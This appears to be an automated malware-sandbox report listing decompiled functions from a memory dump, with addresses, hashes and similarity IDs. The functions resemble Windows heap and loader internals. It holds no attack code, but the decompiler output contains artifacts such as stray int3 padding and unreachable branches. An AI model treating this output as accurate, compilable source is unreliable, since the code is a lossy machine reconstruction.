                                                                          Uniqueness Score: -1.00%

                                                                          Function 0118766D, Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E0118766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E011AF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E011AF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01194620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                          0x01187672
                                                                          0x0118767f
                                                                          0x01187689
                                                                          0x011876de
                                                                          0x011876de
                                                                          0x0118768b
                                                                          0x01187691
                                                                          0x01187693
                                                                          0x01187697
                                                                          0x00000000
                                                                          0x01187699
                                                                          0x011876a8
                                                                          0x00000000
                                                                          0x011876aa
                                                                          0x011876ad
                                                                          0x011876b1
                                                                          0x00000000
                                                                          0x011876b3
                                                                          0x011876b3
                                                                          0x011876b5
                                                                          0x011876ba
                                                                          0x011876bc
                                                                          0x011876bc
                                                                          0x011876c0
                                                                          0x00000000
                                                                          0x011876c2
                                                                          0x011876ce
                                                                          0x011876ce
                                                                          0x011876c0
                                                                          0x011876b1
                                                                          0x011876a8
                                                                          0x01187697
                                                                          0x011876d9

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                          • Instruction ID: fd1e848f7ffc9fad9e5e7ce3c8923d66e3aeac24c6ca67b307a97cdf4e6437ca
                                                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                          • Instruction Fuzzy Hash: 2501D832700119ABE724AE5ECC50E5B7FADEB84664B344524FA08CB290DB31DC41CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0120C450, Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 46%
                                                                          			E0120C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E011B9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E011B95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E011B95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E011B95D0();
				return L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                          0x0120c458
                                                                          0x0120c45d
                                                                          0x0120c466
                                                                          0x0120c468
                                                                          0x0120c469
                                                                          0x0120c46a
                                                                          0x0120c46b
                                                                          0x0120c46e
                                                                          0x0120c46f
                                                                          0x0120c471
                                                                          0x0120c476
                                                                          0x0120c476
                                                                          0x0120c47c
                                                                          0x0120c47e
                                                                          0x0120c480
                                                                          0x0120c480
                                                                          0x0120c483
                                                                          0x0120c484
                                                                          0x0120c486
                                                                          0x0120c488
                                                                          0x0120c48f
                                                                          0x0120c491
                                                                          0x0120c493
                                                                          0x0120c493
                                                                          0x0120c48f
                                                                          0x0120c498
                                                                          0x0120c49e
                                                                          0x0120c4ad
                                                                          0x0120c4ad
                                                                          0x0120c4b2
                                                                          0x0120c4b4
                                                                          0x0120c4cd

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                          • Instruction ID: c78d0f7b55c93ae8f1e01d863ec22a52d83bbaa5bc37c426c842fa5be78de529
                                                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                          • Instruction Fuzzy Hash: DF0196B118050ABFE719AF69CC80EA2FB7DFF55358F014625F314425A0C721ACA1CAA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01179080, Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E01179080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x12685ec;
				E01192280(_t48, 0x12685ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0118FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x126538c; // 0x773b6828
					if( *_t84 != 0x1265388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x124f6e8);
						E011CD0E8(0x12685ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E012488F5(_t80, _t85, 0x1265388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x12686c0; // 0xd007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x12686b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01192280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E012488F5(0x12685ec, _t85, 0x1265388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E011BAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x126b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x12684c0;
																			if(_t82 >=  *0x12684c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01249063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0117922A(_t99);
										_t64 = E01197D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01248B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x12686c0; // 0xd007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x12686b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x12686bc;
													_t87 = 0x12686b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01179240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x12686c4;
												_t87 = 0x12686c0;
												L27:
												E011A9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E011CD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1265388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x126538c = _t51;
						goto L6;
					}
				}
			}




















                                                                          0x01179082
                                                                          0x01179083
                                                                          0x01179084
                                                                          0x01179085
                                                                          0x01179087
                                                                          0x01179096
                                                                          0x01179098
                                                                          0x01179098
                                                                          0x0117909e
                                                                          0x011790a8
                                                                          0x011790e7
                                                                          0x011790e7
                                                                          0x011790aa
                                                                          0x011790b0
                                                                          0x011790b7
                                                                          0x011790bd
                                                                          0x011790dd
                                                                          0x011790e6
                                                                          0x011790bf
                                                                          0x011790bf
                                                                          0x011790c7
                                                                          0x011790cf
                                                                          0x011790f1
                                                                          0x011790f2
                                                                          0x011790f4
                                                                          0x011790f5
                                                                          0x011790f6
                                                                          0x011790f7
                                                                          0x011790f8
                                                                          0x011790f9
                                                                          0x011790fa
                                                                          0x011790fb
                                                                          0x011790fc
                                                                          0x011790fd
                                                                          0x011790fe
                                                                          0x011790ff
                                                                          0x01179100
                                                                          0x01179102
                                                                          0x01179107
                                                                          0x0117910c
                                                                          0x01179110
                                                                          0x01179113
                                                                          0x01179115
                                                                          0x01179136
                                                                          0x0117913f
                                                                          0x01179143
                                                                          0x011d37e4
                                                                          0x011d37e4
                                                                          0x01179117
                                                                          0x01179117
                                                                          0x0117911d
                                                                          0x00000000
                                                                          0x0117911f
                                                                          0x0117911f
                                                                          0x01179125
                                                                          0x00000000
                                                                          0x01179127
                                                                          0x0117912d
                                                                          0x01179130
                                                                          0x01179134
                                                                          0x01179158
                                                                          0x0117915d
                                                                          0x01179161
                                                                          0x01179168
                                                                          0x011d3715
                                                                          0x0117916e
                                                                          0x0117916e
                                                                          0x01179175
                                                                          0x01179177
                                                                          0x0117917e
                                                                          0x0117917f
                                                                          0x01179182
                                                                          0x01179182
                                                                          0x01179187
                                                                          0x01179187
                                                                          0x0117918a
                                                                          0x0117918d
                                                                          0x0117918f
                                                                          0x01179192
                                                                          0x01179195
                                                                          0x01179198
                                                                          0x01179198
                                                                          0x01179198
                                                                          0x0117919a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d371f
                                                                          0x011d3721
                                                                          0x011d3727
                                                                          0x011d372f
                                                                          0x011d3733
                                                                          0x011d3735
                                                                          0x011d3738
                                                                          0x011d373b
                                                                          0x011d373d
                                                                          0x011d3740
                                                                          0x00000000
                                                                          0x011d3746
                                                                          0x011d3746
                                                                          0x011d3749
                                                                          0x00000000
                                                                          0x011d374f
                                                                          0x011d374f
                                                                          0x011d3751
                                                                          0x011d3757
                                                                          0x011d3759
                                                                          0x011d375c
                                                                          0x011d375c
                                                                          0x011d375e
                                                                          0x011d375e
                                                                          0x011d3761
                                                                          0x011d3764
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d3766
                                                                          0x011d3768
                                                                          0x011d37a3
                                                                          0x011d37a3
                                                                          0x011d37a5
                                                                          0x011d37a7
                                                                          0x011d37ad
                                                                          0x011d37b0
                                                                          0x011d37b2
                                                                          0x011d37bc
                                                                          0x011d37c2
                                                                          0x011d37c2
                                                                          0x011d37b2
                                                                          0x01179187
                                                                          0x01179187
                                                                          0x0117918a
                                                                          0x0117918d
                                                                          0x0117918f
                                                                          0x01179192
                                                                          0x01179195
                                                                          0x00000000
                                                                          0x01179195
                                                                          0x00000000
                                                                          0x011d376a
                                                                          0x011d376a
                                                                          0x011d376a
                                                                          0x011d376c
                                                                          0x011d376c
                                                                          0x011d376f
                                                                          0x011d3775
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d3777
                                                                          0x011d3779
                                                                          0x011d3782
                                                                          0x011d3787
                                                                          0x011d3789
                                                                          0x011d3790
                                                                          0x011d3790
                                                                          0x011d378b
                                                                          0x011d378b
                                                                          0x011d378b
                                                                          0x011d3792
                                                                          0x011d3795
                                                                          0x00000000
                                                                          0x011d3795
                                                                          0x00000000
                                                                          0x011d3779
                                                                          0x011d3798
                                                                          0x00000000
                                                                          0x011d3798
                                                                          0x00000000
                                                                          0x011d3768
                                                                          0x011d379b
                                                                          0x011d379b
                                                                          0x011d3751
                                                                          0x011d3749
                                                                          0x00000000
                                                                          0x011d3740
                                                                          0x011791a0
                                                                          0x011791a3
                                                                          0x011791a9
                                                                          0x011791b0
                                                                          0x00000000
                                                                          0x011791b0
                                                                          0x01179187
                                                                          0x011791b4
                                                                          0x011791b4
                                                                          0x011791bb
                                                                          0x011791c0
                                                                          0x011791c5
                                                                          0x011791c7
                                                                          0x011d37da
                                                                          0x011791cd
                                                                          0x011791cd
                                                                          0x011791cd
                                                                          0x011791d2
                                                                          0x011791d5
                                                                          0x01179239
                                                                          0x01179239
                                                                          0x011791d7
                                                                          0x011791db
                                                                          0x011791e1
                                                                          0x011791e7
                                                                          0x011791fd
                                                                          0x01179203
                                                                          0x0117921e
                                                                          0x01179223
                                                                          0x00000000
                                                                          0x01179205
                                                                          0x01179205
                                                                          0x01179208
                                                                          0x0117920c
                                                                          0x01179214
                                                                          0x01179214
                                                                          0x0117920c
                                                                          0x011791e9
                                                                          0x011791e9
                                                                          0x011791ee
                                                                          0x011791f3
                                                                          0x011791f3
                                                                          0x011791f3
                                                                          0x011791e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01179134
                                                                          0x01179125
                                                                          0x0117911d
                                                                          0x0117914e
                                                                          0x011790d1
                                                                          0x011790d1
                                                                          0x011790d3
                                                                          0x011790d6
                                                                          0x011790d8
                                                                          0x00000000
                                                                          0x011790d8
                                                                          0x011790cf

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e781b10f3f5920fff383460d32c710c6a517640ea69c60e685d735c091e8a13
                                                                          • Instruction ID: e4a0253dad31eea0452b7ea4bc7445e4abefece47aa8848844b5f51b0611cfc3
                                                                          • Opcode Fuzzy Hash: 0e781b10f3f5920fff383460d32c710c6a517640ea69c60e685d735c091e8a13
                                                                          • Instruction Fuzzy Hash: 6001F4725212088FC32E9F08D844B117BBDEF45738F218166E1018B791C374DC81CBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01244015, Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E01244015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01192280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01192280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x12686ac);
					E0117F900(0x12686d4, _t28);
					E0118FFB0(0x12686ac, _t28, 0x12686ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0118FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                          0x0124401a
                                                                          0x0124401e
                                                                          0x01244023
                                                                          0x01244028
                                                                          0x01244029
                                                                          0x0124402b
                                                                          0x0124402f
                                                                          0x01244043
                                                                          0x01244046
                                                                          0x01244051
                                                                          0x01244057
                                                                          0x0124405f
                                                                          0x01244062
                                                                          0x01244067
                                                                          0x0124406f
                                                                          0x0124407c
                                                                          0x0124407c
                                                                          0x0124408c
                                                                          0x0124408c
                                                                          0x01244097

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1cc45b4f58456de1fcb7f011a0eb5845e73ec1d2e301bf18d4734d4355a7641
                                                                          • Instruction ID: 762a588aae04118f0ba9ca6c9a7eaaa9c5d9c8fd6e86d705af1320be7252819a
                                                                          • Opcode Fuzzy Hash: a1cc45b4f58456de1fcb7f011a0eb5845e73ec1d2e301bf18d4734d4355a7641
                                                                          • Instruction Fuzzy Hash: 5701F272211A477FC719BB79CD80E17B7ACFF55664B000229F61883A51DB34EC52CAE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012314FB, Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E012314FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x126d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E011BFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01197D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                          0x012314fb
                                                                          0x012314fb
                                                                          0x0123150a
                                                                          0x01231514
                                                                          0x01231519
                                                                          0x0123151b
                                                                          0x01231526
                                                                          0x0123152c
                                                                          0x01231534
                                                                          0x01231537
                                                                          0x0123153a
                                                                          0x01231545
                                                                          0x01231557
                                                                          0x01231547
                                                                          0x01231550
                                                                          0x01231550
                                                                          0x01231562
                                                                          0x01231563
                                                                          0x01231565
                                                                          0x0123156a
                                                                          0x0123157f

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd1632ea8a5d69470aae351147841694a65683bf604023e8aa1c3b453431002b
                                                                          • Instruction ID: 7a8a32517d323424b1a749cb48bef4f9d8a02559d6ee50384c144e254a63d861
                                                                          • Opcode Fuzzy Hash: dd1632ea8a5d69470aae351147841694a65683bf604023e8aa1c3b453431002b
                                                                          • Instruction Fuzzy Hash: E6019E71A1024DAFCB14DFA9D846EAEBBB8EF85704F004066F915EB280DA74DA11CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0123138A, Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E0123138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x126d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E011BFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01197D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                          0x0123138a
                                                                          0x0123138a
                                                                          0x01231399
                                                                          0x012313a3
                                                                          0x012313a8
                                                                          0x012313aa
                                                                          0x012313b5
                                                                          0x012313bb
                                                                          0x012313c3
                                                                          0x012313c6
                                                                          0x012313c9
                                                                          0x012313d4
                                                                          0x012313e6
                                                                          0x012313d6
                                                                          0x012313df
                                                                          0x012313df
                                                                          0x012313f1
                                                                          0x012313f2
                                                                          0x012313f4
                                                                          0x012313f9
                                                                          0x0123140e

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 419680acf17418bd086ce9e62e780b90189f4e55230c76f76d1fb475b9ab70fa
                                                                          • Instruction ID: 36ecff337138667134f858b4555f30a19d0bc0b0a2d88e089ff0401a43a61e42
                                                                          • Opcode Fuzzy Hash: 419680acf17418bd086ce9e62e780b90189f4e55230c76f76d1fb475b9ab70fa
                                                                          • Instruction Fuzzy Hash: 04019271A1020DAFCB14DFA9D881EAEBBB8EF44700F004056F900EB280D7749A11CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0118B02A, Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0118B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01197D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E011F7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                          0x0118b037
                                                                          0x0118b039
                                                                          0x0118b03b
                                                                          0x0118b040
                                                                          0x011da60e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011da61d
                                                                          0x0118b04b
                                                                          0x0118b04e
                                                                          0x011da627
                                                                          0x011da634
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011da641
                                                                          0x011da653
                                                                          0x011da643
                                                                          0x011da64c
                                                                          0x011da64c
                                                                          0x011da65b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011da66c
                                                                          0x0118b057
                                                                          0x0118b057
                                                                          0x0118b057
                                                                          0x0118b046
                                                                          0x0118b046
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                          • Instruction ID: 42cd391c15e9b804fe3b84748ec4887475e3c1d0d67f8a2ac697cccfae78d5c7
                                                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                          • Instruction Fuzzy Hash: 3A018F32204980DFE32ED71CD988F667BE8EF85B54F0940A1FA19CBA91D768DC41CA25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01241074, Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E01241074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0124165E(__ebx, 0x1268ae4, (__edx -  *0x1268b04 >> 0x14) + (__edx -  *0x1268b04 >> 0x14), __edi, __ecx, (__edx -  *0x1268b04 >> 0x14) + (__edx -  *0x1268b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0123AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01197D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0122FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                          0x01241074
                                                                          0x01241080
                                                                          0x01241082
                                                                          0x0124108a
                                                                          0x0124108f
                                                                          0x01241093
                                                                          0x012410ab
                                                                          0x012410ab
